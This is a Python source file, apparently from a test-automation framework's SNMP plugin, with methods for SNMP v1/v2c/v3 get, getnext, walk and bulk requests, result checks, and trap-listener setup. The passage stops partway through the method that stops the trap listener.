WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
"""
Implementation of the standard SNMP protocol commands for SNMP v1 and v2c and V3
and IPv6 support added.
SNMP v3 Trap and Inform support added.
"""
import os, re, ast
import socket
from warrior.Framework import Utils
from warrior.Framework.Utils.print_Utils import print_exception
from warriorsnmp.ClassUtils.snmp_utlity_class import WSnmp as ws
from warrior.Framework.Utils import testcase_Utils, config_Utils, data_Utils
from warriorsnmp.Utils import snmp_utils
from threading import Thread
from time import sleep
try:
from pysnmp.entity.rfc3413 import ntfrcv
from pysnmp.smi import builder, view, compiler, rfc1902, error
except ImportError:
testcase_Utils.pNote("Please Install PYSNMP 4.3.8 or Above", "error")
class CommonSnmpActions(object):
"""
Class for standard SNMP protocol commands
"""
def __init__(self):
"""
This is intialization
"""
self.resultfile = Utils.config_Utils.resultfile
self.datafile = Utils.config_Utils.datafile
self.logsdir = Utils.config_Utils.logsdir
self.filename = Utils.config_Utils.filename
self.logfile = Utils.config_Utils.logfile
self.snmpver = {'1':'0', '2':'1', '2c':'1', '3':'2'}
def snmp_get(self, snmp_ver, system_name, mib_name=None,
mib_index=None, mib_value=None,
oid_string=None, communityname=None,
snmp_timeout=60,
userName=None, authKey=None, privKey=None, authProtocol=None,
privProtocol=None,
custom_mib_paths=None,
load_mib_modules=None):
"""
snmp_get uses the SNMP GET request to query for information on a
network entity
:Datafile usage:
1.(string) Agents IP address. address="192.168.1.68"
2.(string) SNMP UDP port. port="161"
:Arguments:
1.communityname : SNMP v1/v2c community string. e.g. 'public'
2. snmp_ver: Support for v1 and V2 and V3 1 for v1, 2 for V2, 3 for V3
3.mib_name : Name of the Management Information Base e.g. 'IF-MIB'
4.mib_index: MIB index name e.g. 'ipAdEntAddr'
5.mib_value: e.g. '127.0.0.1'
6.oid_string: object identifiers (OIDs) that are available on the
managed device.
e.g. '1.3.6.1.2.1.2.2.1.6' which is, ifPhysAddress
The physical address of the interface.
User can provide either MIB or oid_string.
7.system_name(string) = Name of the system from the input datafile
8.snmp_timeout: Number of seconds the SNMP manager will wait for a
responce from SNMP Agent. In case of SNMP walk the may need to
set to higher.
#arguments 9-13 are only for SNMPv3 or mpModel = 2 and in that
# case communityname will be None
9.userName(string) = A human readable string representing the
name of the SNMP USM user.
e.g. 'usr1'
10.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
11.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
12.authProtocol(string) = An indication of whether messages sent on behalf of
this USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol="1,3,6,1,6,3,10,1,1,2"
13.privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol="1,3,6,1,6,3,10,1,2,2"
14.custom_mib_paths: User can provide multiple MIB source path seperated by comma (',')
Source path can be url or just absolute directory path. Refer bellow example.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
15.load_mib_modules: User can provide the MIBS(name) need to be loaded
from the path "custom_mib_path".
It is a string of MIB names separated by comma(',')
:Return:
status(bool)= True / False.
output_dict = consists of following key value:
1.errindication: If this string is not empty, it indicates the SNMP
engine error.
2.errstatus: If this element evaluates to True, it indicates an
error in the SNMP communication.Object that generated
the error is indicated by the errindex element.
3.errindex: If the errstatus indicates that an error has occurred,
this field can be used to find the SNMP object that
caused the error. The object position in the result
array is errindex-1.
4.result: This element contains a list of all returned SNMP object
elements. Each element is a tuple that contains the name
of the object and the object value.
"""
wdesc = "Executing SNMP GET command"
Utils.testcase_Utils.pSubStep(wdesc)
status = False
snmp_parameters = ['ip', 'snmp_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ipaddr = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_port')
output_dict = {}
temp_custom_mib_paths = None
wsnmp = ws(communityname, self.snmpver.get(snmp_ver), ipaddr, port, snmp_timeout,
userName, authKey, privKey, authProtocol,
privProtocol)
cmdgen = wsnmp.commandgenerator()
if self.snmpver.get(snmp_ver) is '2':# for ssnmp v3
auth_data = wsnmp.usmuserdata()
else: #for snmp v1 or v2c
auth_data = wsnmp.communitydata()
if ':' in ipaddr:#for ipv6
transport = wsnmp.udp6transporttarget()
else: #for ipv4
transport = wsnmp.udptransporttarget()
if custom_mib_paths:
temp_custom_mib_paths = snmp_utils.split_mib_path(custom_mib_paths)
if oid_string == None and mib_name == None:
testcase_Utils.pNote("Please provide OID or MIB Information!", "error")
if oid_string:
oid = tuple([int(e) if e.isdigit() else e for e in oid_string.split('.')])
else:
if custom_mib_paths:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value).\
addAsn1MibSource(*temp_custom_mib_paths)
else:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value)
try:
errindication, errstatus,\
errindex, result = cmdgen.getCmd(auth_data, transport, oid)
output_dict = {
'{0}_errindication'.format(system_name):errindication,
'{0}_errstatus'.format(system_name):errstatus,
'{0}_errindex'.format(system_name):errindex,
'{0}_result'.format(system_name):result,
'{0}_custom_mib_paths'.format(system_name):temp_custom_mib_paths,
'{0}_load_mib_modules'.format(system_name):load_mib_modules
}
if result != []:
status = True
testcase_Utils.pNote("Successfully executed SNMP GET command {}"
.format(result), "info")
else:
testcase_Utils.pNote("Failure SNMP Command Return Null Value! {}"
.format(result), "error")
except wsnmp.exception as excep:
status = False
testcase_Utils.pNote("SNMP GET command Failed!\n{}".format(excep), "error")
Utils.testcase_Utils.report_substep_status(status)
return status, output_dict
def snmp_getnext(self, snmp_ver, system_name, mib_name=None,
mib_index=None, mib_value=None,
oid_string=None, communityname=None,
snmp_timeout=60, max_rows=1,
userName=None, authKey=None, privKey=None, authProtocol=None,
privProtocol=None, custom_mib_paths=None, load_mib_modules=None):
"""
snmp_get_next uses the SNMP GETNEXT request to query for information
on a network entity
:Datafile usage:
1.(string) Agents IP address. address="192.168.1.68"
2.(string) SNMP UDP port. port="161"
:Arguments:
1.communityname : SNMP v1/v2c community string. e.g. 'public'
2. snmp_ver: Support for v1 and V2 and V3 1 for v1, 2 for V2, 3 for V3
3.mib_name : Name of the Management Information Base e.g. 'IF-MIB'
4.mib_index: MIB index name e.g. 'ipAdEntAddr'
5.mib_value: e.g. '127.0.0.1'
6.oid_string: object identifiers (OIDs) that are available on the
managed device.
e.g. '1.3.6.1.2.1.2.2.1.6' which is, ifPhysAddress
The physical address of the interface.
User can provide either MIB or oid_string.
7. system_name(string) = Name of the system from the input datafile
8. snmp_timeout: Number of seconds the SNMP manager will wait for a
responce from SNMP Agent. In case of SNMP walk the may need to
set to higher.
9.max_rows = By default its value is one if user wants to change the
no of get next message from the given OID or MIB value they can change it with
different no.
#arguments 9-13 are only for SNMPv3 or mpModel = 2 and in that
# case communityname will be None
10.userName(string) = A human readable string representing the
name of the SNMP USM user.
e.g. 'usr1'
11.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
12.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
13.authProtocol(string) = An indication of whether messages sent on behalf of this
USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol='1,3,6,1,6,3,10,1,1,2'
14.privProtocols(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol='1,3,6,1,6,3,10,1,2,2)'
15.custom_mib_paths: User can provide multiple MIB source path seperated by comma (',')
Source path can be url or just absolute directory path. Refer bellow example.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
16.load_mib_module: User can provide the MIBS(name) need to be loaded from the path
"custom_mib_path".It is a string of MIB names separated by comma(',')
:Return:
status(bool)= True / False.
output_dict = consists of following key value:
1.errindication: If this string is not empty, it indicates
the SNMP engine error.
2.errstatus: If this element evaluates to True,it indicates an error
in the SNMP communication.Object that generated
the error is indicated by the errindex element.
3.errindex: If the errstatus indicates that an error has occurred,
this field can be used to find the SNMP object that
caused the error.
The object position in the result array is errindex-1.
4.result: This element contains a list of all returned SNMP object
elements. Each element is a tuple that contains the name
of the object and the object value.
"""
wdesc = "Executing SNMP GETNEXT command"
Utils.testcase_Utils.pSubStep(wdesc)
status = False
snmp_parameters = ['ip', 'snmp_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ipaddr = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_port')
output_dict = {}
temp_custom_mib_paths = None
wsnmp = ws(communityname, self.snmpver.get(snmp_ver), ipaddr, port, snmp_timeout,
userName, authKey, privKey, authProtocol,
privProtocol)
cmdgen = wsnmp.commandgenerator()
if self.snmpver.get(snmp_ver) is '2':# for ssnmp v3
auth_data = wsnmp.usmuserdata()
else: #for snmp v1 or v2c
auth_data = wsnmp.communitydata()
if ':' in ipaddr:#for ipv6
transport = wsnmp.udp6transporttarget()
else: #for ipv4
transport = wsnmp.udptransporttarget()
if custom_mib_paths:
temp_custom_mib_paths = snmp_utils.split_mib_path(custom_mib_paths)
if oid_string == None and mib_name == None:
testcase_Utils.pNote("Please provide OID or MIB Information!", "error")
if oid_string:
oid = tuple([int(e) if e.isdigit() else e for e in oid_string.split('.')])
else:
if custom_mib_paths:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value).\
addAsn1MibSource(*temp_custom_mib_paths)
else:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value)
try:
errindication, errstatus, errindex, \
result = cmdgen.nextCmd(auth_data,
transport, oid,
ignoreNonIncreasingOid=True, maxRows=int(max_rows),
lookupNames=True, lookupValues=True, lexicographicMode=True)
# maxRows=1 will control the mib walk
output_dict = {
'{0}_errindication'.format(system_name):errindication,
'{0}_errstatus'.format(system_name):errstatus,
'{0}_errindex'.format(system_name):errindex,
'{0}_result'.format(system_name):result,
'{0}_custom_mib_paths'.format(system_name):temp_custom_mib_paths,
'{0}_load_mib_modules'.format(system_name):load_mib_modules}
if result != []:
status = True
testcase_Utils.pNote("Successfully executed SNMP GET-NEXT "
"command {}".format(result), "info")
else:
testcase_Utils.pNote("Failure SNMP Command Return Null Value! {} {} {} {} xyz".
format(result, errindication, errstatus, errindex), "error")
except wsnmp.exception as excep:
status = False
testcase_Utils.pNote("SNMP GET-Next command Failed! \n{}".format(excep), "error")
Utils.testcase_Utils.report_substep_status(status)
return status, output_dict
def snmp_walk(self, snmp_ver, system_name, mib_name=None, mib_index=None,
mib_value=None, oid_string=None, communityname=None,
snmp_timeout=60, userName=None, authKey=None, privKey=None,
authProtocol=None, privProtocol=None, custom_mib_paths=None,
load_mib_modules=None, lexicographicMode="False"):
"""
snmp_walk uses the SNMP WALK request to query for information on
a network entity
:Datafile usage:
1.(string) Agents IP address. address="192.168.1.68"
2.(string) SNMP UDP port. port="161"
:Arguments:
1.communityname : SNMP v1/v2c community string. e.g. 'public'
2. snmp_ver: Support for v1 and V2 and V3 1 for v1, 2 for V2, 3 for V3
3.mib_name : Name of the Management Information Base e.g. 'IF-MIB'
4.mib_index: MIB index name e.g. 'ipAdEntAddr'
5.mib_value: e.g. '127.0.0.1'
6.oid_string: object identifiers (OIDs) that are available on the
managed device.
e.g. '1.3.6.1.2.1.2.2.1.6' which is, ifPhysAddress
The physical address of the interface.
User can provide either MIB or oid_string.
7. system_name(string) = Name of the system from the input datafile
8. snmp_timeout: Number of seconds the SNMP manager will wait for a
responce from SNMP Agent. In case of SNMP walk the may need to
set to higher.
#arguments 9-13 are only for SNMPv3 or mpModel = 2 and in that
# case communityname will be None
9.userName(string) = A human readable string representing the
name of the SNMP USM user.
e.g. 'usr1'
10.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
11.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
12.authProtocol(string) = An indication of whether messages sent on behalf of this
USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol='1,3,6,1,6,3,10,1,1,2'
13.privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol='1,3,6,1,6,3,10,1,2,2'
14.custom_mib_paths: User can provide multiple MIB source path seperated by comma (',')
Source path can be url or just absolute directory path. Refer bellow example.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
15.load_mib_modules: User can provide the MIBS(name) need to be loaded from the path
"custom_mib_path". It is a string of MIB names separated by comma(',')
16.lexicographicMode : "True" will return everything under given prefix plus the next table also e.g. if request 1.3.6.1 will also provide 1.3.6.2$
"False" will return only under given prefix. Default its False.
:Return:
status(bool)= True / False.
output_dict = consists of following key value:
1.errindication: If this string is not empty, it indicates
the SNMP engine error.
2.errstatus: If this element evaluates to True,it indicates an error
in the SNMP communication.Object that generated
the error is indicated by the errindex element.
3.errindex: If the errstatus indicates that an error has occurred,
this field can be used to find the SNMP object that
caused the error.
The object position in the result array is errindex-1.
4.result: This element contains a list of all returned SNMP object
elements. Each element is a tuple that contains the name
of the object and the object value.
"""
wdesc = "Executing SNMP WALK command"
Utils.testcase_Utils.pSubStep(wdesc)
status = False
snmp_parameters = ['ip', 'snmp_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ipaddr = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_port')
output_dict = {}
temp_custom_mib_paths = None
wsnmp = ws(communityname, self.snmpver.get(snmp_ver), ipaddr, port, snmp_timeout,
userName, authKey, privKey, authProtocol,
privProtocol)
cmdgen = wsnmp.commandgenerator()
if self.snmpver.get(snmp_ver) is '2':# for snmp v3
auth_data = wsnmp.usmuserdata()
else: #for snmp v1 or v2c
auth_data = wsnmp.communitydata()
if ':' in ipaddr:#for ipv6
transport = wsnmp.udp6transporttarget()
else: #for ipv4
transport = wsnmp.udptransporttarget()
if oid_string == None and mib_name == None:
testcase_Utils.pNote("Please provide OID or MIB Information!", "error")
if custom_mib_paths:
temp_custom_mib_paths = snmp_utils.split_mib_path(custom_mib_paths)
if oid_string: #OID String is optional
oid = tuple([int(e) if e.isdigit() else e for e in oid_string.split('.')])
else:
if custom_mib_paths:
oid = wsnmp.mibvariable(mib_name, mib_index).\
addAsn1MibSource(*temp_custom_mib_paths)
else:
oid = wsnmp.mibvariable(mib_name, mib_index)
try:
errindication, errstatus, errindex,\
result = cmdgen.nextCmd(auth_data,
transport,
oid, lexicographicMode=ast.literal_eval(lexicographicMode.
capitalize()),
ignoreNonIncreasingOid=True, maxRows=50000,
lookupNames=True, lookupValues=True)
output_dict = {
'{0}_errindication'.format(system_name):errindication,
'{0}_errstatus'.format(system_name):errstatus,
'{0}_errindex'.format(system_name):errindex,
'{0}_result'.format(system_name):result,
'{0}_custom_mib_paths'.format(system_name):temp_custom_mib_paths,
'{0}_load_mib_modules'.format(system_name):load_mib_modules
}
if result != []:
status = True
testcase_Utils.pNote("Successfully executed SNMP WALK command {}".
format(result), "info")
else:
testcase_Utils.pNote("Failure SNMP Command Return Null Value! {} {} {}".
format(result, errindication.prettyPrint(),
errstatus.prettyPrint()), "error")
except wsnmp.exception as excep:
status = False
testcase_Utils.pNote("SNMP Walk command Failed!\n{}".format(excep), "error")
Utils.testcase_Utils.report_substep_status(status)
return status, output_dict
def snmp_bulkget(self, snmp_ver, system_name, mib_name=None,
mib_index=None, mib_value=None,
oid_string=None, communityname=None,
snmp_timeout=60, nonrepeaters='0', maxrepetitions='10',
userName=None, authKey=None, privKey=None, authProtocol=None,
privProtocol=None, custom_mib_paths=None, load_mib_modules=None,
lexicographicMode="False"):
"""
snmp_bulkget uses the SNMP BULKGET request to query for information on
a network entity
:Datafile usage:
1.(string) Agents IP address. address="192.168.1.68"
2.(string) SNMP UDP port. port="161"
:Arguments:
1.communityname : SNMP v1/v2c community string. e.g. 'public'
2. snmp_ver: Support for v1 and V2 and V3 1 for v1, 2 for V2, 3 for V3
3.mib_name : Name of the Management Information Base e.g. 'IF-MIB'
4.mib_index: MIB index name e.g. 'ipAdEntAddr'
5.mib_value: e.g. '127.0.0.1'
6.oid_string: object identifiers (OIDs) that are available on the
managed device.
e.g. '1.3.6.1.2.1.2.2.1.6' which is, ifPhysAddress
The physical address of the interface.
User can provide either MIB or oid_string.
7. system_name(string) = Name of the system from the input datafile
9. snmp_timeout: Number of seconds the SNMP manager will wait for a
responce from SNMP Agent. In case of SNMP walk the may need to
set to higher.
#arguments 9-13 are only for SNMPv3 or mpModel = 2 and in that
# case communityname will be None
10.userName(string) = A human readable string representing the
name of the SNMP USM user.
e.g. 'usr1'
11.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
12.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
13.authProtocol(string) = An indication of whether messages sent on behalf of this
USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol='1,3,6,1,6,3,10,1,1,2'
14.privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol='1,3,6,1,6,3,10,1,2,2'
15.custom_mib_paths: User can provide multiple MIB source path seperated by comma (',')
Source path can be url or just absolute directory path. Refer bellow example.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
16.load_mib_modules: User can provide the MIBS(name) need to be loaded from the path "custom_mib_path".
It is a string of MIB names separated by comma(',')
17.lexicographicMode : "True" will return everything under given prefix plus the next table also e.g. if request 1.3.6.1 will also provide 1.3.6.2
"False" will return only under given prefix. Default its False.
18. maxrepetitions: This specifies the maximum number of iterations over the repeating variables. The default is 10.
19. nonrepeaters : This specifies the number of supplied variables that should not be iterated over. default is 0
:Return:
status(bool)= True / False.
output_dict = consists of following key value:
1.errindication: If this string is not empty, it indicates
the SNMP engine error.
2.errstatus: If this element evaluates to True,it indicates an error
in the SNMP communication.Object that generated
the error is indicated by the errindex element.
3.errindex: If the errstatus indicates that an error has occurred,
this field can be used to find the SNMP object that
caused the error.
The object position in the result array is errindex-1.
4.result: This element contains a list of all returned SNMP object
elements. Each element is a tuple that contains the name
of the object and the object value.
"""
wdesc = "Executing SNMP BULKGET command"
Utils.testcase_Utils.pSubStep(wdesc)
status = False
snmp_parameters = ['ip', 'snmp_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ipaddr = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_port')
output_dict = {}
temp_custom_mib_paths = None
wsnmp = ws(communityname, self.snmpver.get(snmp_ver), ipaddr, port, snmp_timeout,
userName, authKey, privKey,authProtocol,
privProtocol)
cmdgen = wsnmp.commandgenerator()
if self.snmpver.get(snmp_ver) is '2':# for ssnmp v3
auth_data = wsnmp.usmuserdata()
else: #for snmp v1 or v2c
auth_data = wsnmp.communitydata()
if ':' in ipaddr:#for ipv6
transport = wsnmp.udp6transporttarget()
else: #for ipv4
transport = wsnmp.udptransporttarget()
if custom_mib_paths:
temp_custom_mib_paths = snmp_utils.split_mib_path(custom_mib_paths)
if oid_string == None and mib_name == None:
testcase_Utils.pNote("Please provide OID or MIB Information!", "error")
if oid_string:
oid = tuple([int(e) if e.isdigit()
else e for e in oid_string.split('.')])
else:
if custom_mib_paths:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value).addAsn1MibSource(*temp_custom_mib_paths)
else:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value)
try:
errindication, errstatus, errindex, \
result = cmdgen.bulkCmd(auth_data,
transport,
int(nonrepeaters), int(maxrepetitions), oid,
lookupNames=True,
lookupValues=True,
lexicographicMode=ast.literal_eval(lexicographicMode.capitalize()),
maxRows=int(maxrepetitions)
)
# nonrepeaters(1)(int): One MIB variable is requested in response
# for the first nonRepeaters MIB variables in request.
# maxRepetitions(25)(int): maxRepetitions MIB variables are
# requested in response for each of the remaining MIB variables in
# the request (e.g. excluding nonRepeaters). Remote SNMP engine may
# choose lesser value than requested.
output_dict = {
'{0}_errindication'.format(system_name):errindication,
'{0}_errstatus'.format(system_name):errstatus,
'{0}_errindex'.format(system_name):errindex,
'{0}_result'.format(system_name):result,
'{0}_custom_mib_paths'.format(system_name):temp_custom_mib_paths,
'{0}_load_mib_modules'.format(system_name):load_mib_modules}
if result != []:
status = True
testcase_Utils.pNote("Successfully executed SNMP BULK GET "
"command {}".format(result), "info")
else:
testcase_Utils.pNote("Failure SNMP Command Return Null Value! {}".format(result), "error")
except wsnmp.exception as excep:
status = False
testcase_Utils.pNote("SNMP BULK GET command Failed!\n{}".format(excep), "error")
Utils.testcase_Utils.report_substep_status(status)
return status, output_dict
def verify_snmp_action(self, system_name, snmp_result, mib_string=None
):
"""
Will Verify SNMP get/getnext/walk/getbulk actions.
:Datafile usage:
NA
:Arguments:
1. system_name(string) = Name of the system from the input datafile
2. mib_string(string) = MIB string
e.g.'SNMPv2-SMI::enterprises.3861.3.2.100.1.2.0'
3. result(string) = SNMP Output string
e.g. '1Finity-T100'
:Returns:
1. status(bool)
"""
wdesc = "Verify the SNMP Action Results"
Utils.testcase_Utils.pSubStep(wdesc)
errindication = Utils.data_Utils.get_object_from_datarepository(str(system_name)+"_errindication")
varBindTable = Utils.data_Utils.get_object_from_datarepository(str(system_name)+"_result")
errorstatus = Utils.data_Utils.get_object_from_datarepository(str(system_name)+"_errstatus")
errindex = Utils.data_Utils.get_object_from_datarepository(str(system_name)+"_errindex")
custom_mib_paths = Utils.data_Utils.get_object_from_datarepository(str(system_name)+"_custom_mib_paths")
load_mib_modules = Utils.data_Utils.get_object_from_datarepository(str(system_name)+"_load_mib_modules")
#Non-empty errorIndication string indicates SNMP engine-level error.
#The pair of errorStatus and errorIndex variables determines SNMP
#PDU-level error. If errorStatus evaluates to true, this indicates SNMP
#PDU error caused by Managed Object at position errorIndex-1 in \
#varBinds. Doing errorStatus.prettyPrint() would return an
# explanatory text error message.
result_list = []
status = False
if errindication:
testcase_Utils.pNote("%s" % errindication.prettyPrint())
else:
if errorstatus:
testcase_Utils.pNote('%s at %s' % (errorstatus.prettyPrint(),
errindex and
varBindTable[-1][int(errindex)-1][0]or '?'))
else:
if varBindTable:
if type(varBindTable[0]) is not list:
# for SNMP Get/Get-Next output only
for name, val in varBindTable:
result_list.append(snmp_utils.translate_mib(custom_mib_paths, load_mib_modules, name, val))
else:
# for SNMP Getbulk/walk output only
for varBindTableRow in varBindTable:
for name, val in varBindTableRow:
result_list.append(snmp_utils.translate_mib(custom_mib_paths, load_mib_modules, name, val))
else:
testcase_Utils.pNote("No SNMP Result Present!", 'error')
for element in result_list:
if mib_string:
if mib_string in element[0] and snmp_result in element[-1]:
status = True
testcase_Utils.pNote('%s and %s found in SNMP Output' %(
mib_string, snmp_result))
break
else:
if snmp_result in element[-1]:
status = True
testcase_Utils.pNote('%s Found! in SNMP Output' %(
snmp_result))
break
if status == False:
if mib_string:
testcase_Utils.pNote('{} and {} NOT Found in SNMP Output'.format(mib_string, snmp_result))
else:
testcase_Utils.pNote('{} NOT Found in SNMP Output'.format(snmp_result))
Utils.testcase_Utils.report_substep_status(status)
return status
def add_snmp_v3_user(self, port, username, securityEngineId,
authkey=None, privkey=None,
authProtocol=None, privProtocol=None):
"""
Add SNMP V3 User for TRAP and Inform
Argument:
1. port: SNMP trap or inform port.
2. username(string) = snmp v3 username.
3. securityEngineId(string) = SNMP v3 secure engine id which is a mandatory
argument for any V3 user. both sender and reciver should know
this id. refer: http://www.net-snmp.org/tutorial/tutorial-5/commands/snmptrap-v3.html
4.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
5.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
6.authProtocol(string) = An indication of whether messages sent on behalf of this USM user
can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol="1,3,6,1,6,3,10,1,1,2"
7.privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol="1,3,6,1,6,3,10,1,2,2"
Return: True or False
"""
status = True
wdesc = "Add SNMP V3 User for TRAP and Inform"
Utils.testcase_Utils.pSubStep(wdesc)
status = ws.add_user(port, username, securityEngineId,
authkey, privkey, authProtocol, privProtocol)
Utils.testcase_Utils.report_substep_status(status)
return status
def add_snmp_community(self, port, community_string):
"""
Add the SNMP community string
:param port: SNMP TRAP or Inform PORT
:param community_string: SNMP community String
:return:
"""
status = True
status = ws.add_community(port, community_string)
Utils.testcase_Utils.report_substep_status(status)
return status
def start_trap_listener(self, system_name,
custom_mib_path=None,
load_mib_module='SNMPv2-MIB,SNMP-COMMUNITY-MIB'
):
"""
Start trap listener on Given port and IP address. It creates a socket
with given port and ip.The Trap listner is only for SNMP v1 and v2c and v3.
Arguments:
system_name: SNMP Agents system name from the data file.
custom_mib_path: User can provide multiple MIB source path seperated by comma (',')
Source path can be url or just absolute directory path. Refer bellow example.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
load_mib_module: User can provide the MIBS(name) need to be loaded from the path "custom_mib_path".
It is a string of MIB names separated by comma(',')
e.g. "FSS-COMMON-TC,FSS-COMMON-LOG,FSS-COMMON-SMI"
Data File Usage:
<ip> : Ip of the agent. It has to be IP not a hostname.
<snmp_port>: SNMP Port. UDP port e.g. 161 or 1036.
<snmp_trap_port> : SNMP trap port. UDP port e.g. 162 or any othe custom port.1036
if NESNMP or any other SNMP protocol is using the 162 port please use any other port other than 162.
<community>: form this release community string is mandatory for v2 and v1 SNMP trap.
you can add multiple community like 'public,testing' or single like 'public'
<snmp_username>: For SNMP v3 this and engine id are mandatory argument. e.g. 'user_snmp1234'
<securityEngineId>: One mandatory argument for V3 trap and inform.e.g. '80000F150000000000000000'.
For noAuthNoPriv none of the bellow attributes are required.
<authkey>: Auth password. e.g. 'authkey123'
<authProtocol>: authProtocol e.g. 'usmHMACMD5AuthProtocol'
authProtocol(string) = An indication of whether messages sent on behalf of this USM user
can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
<privkey>: private key e.g. 'privkey1'
<privProtocol>: privProtocol e.g. 'usmDESPrivProtocol'
privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
Return: True or False
"""
status = True
wdesc = "Starting Trap listener"
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port', 'community', 'snmp_username',
'securityEngineId', 'authkey', 'privkey',
'authProtocol', 'privProtocol']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ip = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_trap_port')
community = snmp_param_dic.get('community', None)
username = snmp_param_dic.get('snmp_username', None)
securityEngineId = snmp_param_dic.get('securityEngineId', None)
privkey = snmp_param_dic.get('privkey', None)
authkey = snmp_param_dic.get('authkey', None)
authProtocol = snmp_param_dic.get('authProtocol', None)
privProtocol = snmp_param_dic.get('privProtocol', None)
engine = ws.get_asyncoredispatcher(port)
ntfrcv.NotificationReceiver(engine, ws.trap_decoder)
ws.data_repo.update({"custom_mib_path":custom_mib_path,
"load_mib_module":load_mib_module})
trap_listner_job = Thread(target=ws.create_trap_listner_job, args=(port, ))
trap_listner_job_start = Thread(target=ws.start_trap_listner_job, args=(port,))
trap_listner_job.daemon = True
trap_listner_job_start.daemon = True
trap_listner_job.start()
if community:
stats = ws.add_community(port, community)
status = status and stats
if username and securityEngineId:
stats = self.add_snmp_v3_user(port, username, securityEngineId,
authkey, privkey,
authProtocol, privProtocol)
status = status and stats
sleep(1)
trap_listner_job_start.start()
sleep(2)
Utils.testcase_Utils.report_substep_status(status)
return status
def stop_trap_listener(self, system_name):
"""
Stop Trap listener job
Argument:
system_name: Agent system name given in the data file.
:return: Binary True or False
"""
status = True
wdesc = "Stop Trap listener"
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ip = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_trap_port')
